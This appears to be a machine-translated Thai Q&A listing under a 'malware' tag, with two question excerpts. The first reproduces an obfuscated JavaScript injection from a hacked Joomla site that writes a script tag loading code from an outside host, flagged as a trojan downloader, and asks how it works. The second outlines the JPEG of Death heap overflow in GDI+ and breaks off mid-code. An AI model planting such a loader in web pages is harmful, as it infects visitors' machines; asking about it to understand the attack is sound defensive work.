คำถามติดแท็ก malware

8
ไซต์นี้ติดไวรัสสคริปต์ทำงานอย่างไร
Joomla ของฉัน! เว็บไซต์ถูกแฮ็กซ้ำหลายครั้ง มีคนจัดการเพื่อฉีดขยะต่อไปนี้ลงในสคริปต์ php ที่สำคัญ แต่ฉันไม่ได้พูดถึงการกำหนดค่า Joomla มีผู้เยี่ยมชมไซต์ไม่มากนัก (ในบางครั้งฉันกลัวว่าฉันอาจเป็นผู้เยี่ยมชมเพียงคนเดียวของไซต์นั้น ... ) และฉันไม่สนใจมากนักที่จะให้ไซต์สำรองและทำงาน ฉันจะจัดการในที่สุด คำถามของฉันคือขยะนี้ทำงานอย่างไร ฉันมองไปที่มันและฉันไม่เห็นว่าสิ่งนี้จัดการเพื่อทำอันตรายใด ๆ ได้อย่างไร? สิ่งที่พยายามดาวน์โหลดไฟล์ PDF ชื่อ ChangeLog.pdf ซึ่งติดไวรัสโทรจันและหลังจากเปิดแล้วจะทำให้ Acrobat ของคุณค้างและสร้างความหายนะในเครื่องของคุณ มันทำอย่างไรฉันไม่รู้ฉันไม่สนใจ แต่ส่วนของสคริปต์ต่อไปนี้เรียกการดาวน์โหลดได้อย่างไร <script>/*Exception*/ document.write('<script src='+'h#^(t@)((t$&@p#:)&/!$/)@d$y#^#$n@$d^!!&n#s$)^-$)o^^(r!#g!!#$.^^@g))!a#m#@$e&$s^@@!t@@($!o@$p(.&@c&)@(o$m)).!$m$)y@(b@e()s&$t$@y&o$&(u#)$x&&^(i)-@^c!!&n$#.(@g)$e#(^n&!u(i&#&n(e&(!h&o@&^&l^$(l)&y$(#@w!o@!((o#d&^.^#)r$#^u!!$:(#@&8#)(0$8@&0^(/))s#o#^&#^f!$t$!o##n(&$i(^!c$(.!&c@o!&^m#&/&(s&$(o!f&!t@&o!!n)&i$&c!.#^^c)!$o@@((m@#/$^!g#^o$^&o&#g!l)@@@!e&.))c!)(o#@#^!m(&/^^l#^@i##(v&@e&)!$j^!a@$s#m!i)n$.!$c&$o)@$m^/@$v&i^d^()e(!o&&s@(z(@)^.@)c$&o^m)$)^/#$'.replace(/#|\$|@|\^|&|\(|\)|\!/ig, '')+' defer=defer></scr'+'ipt>');</script> <!--6f471c20c9b96fed179c85ffdd3365cf--> ESETตรวจพบรหัสนี้เป็นโทรจัน JS / TrojanDownloader.Agent.NRO

2
ช่องโหว่ JPEG of Death ทำงานอย่างไร?
ฉันได้อ่านเกี่ยวกับการใช้ประโยชน์จาก GDI + รุ่นเก่าบน Windows XP และWindows Server 2003 ที่เรียกว่า JPEG of death สำหรับโครงการที่ฉันกำลังทำอยู่ การใช้ประโยชน์สามารถอธิบายได้ดีในลิงค์ต่อไปนี้: http://www.infosecwriters.com/text_resources/pdf/JPEG.pdf โดยทั่วไปไฟล์ JPEG จะมีส่วนที่เรียกว่า COM ที่มีฟิลด์ความคิดเห็น (อาจว่างเปล่า) และค่าสองไบต์ที่มีขนาดของ COM หากไม่มีความคิดเห็นขนาดคือ 2 ตัวอ่าน (GDI +) จะอ่านขนาดลบสองและจัดสรรบัฟเฟอร์ที่มีขนาดเหมาะสมเพื่อคัดลอกความคิดเห็นในฮีป การโจมตีเกี่ยวข้องกับการวางมูลค่า0ในสนาม GDI + หัก2นำไปสู่ค่า-2 (0xFFFe)ที่ได้รับการแปลงเป็นจำนวนเต็มไม่ได้ลงนามโดย0XFFFFFFFEmemcpy โค้ดตัวอย่าง: unsigned int size; size = len - 2; char *comment = (char *)malloc(size + …
94 c++  security  memcpy  malware 
โดยการใช้ไซต์ของเรา หมายความว่าคุณได้อ่านและทำความเข้าใจนโยบายคุกกี้และนโยบายความเป็นส่วนตัวของเราแล้ว
Licensed under cc by-sa 3.0 with attribution required.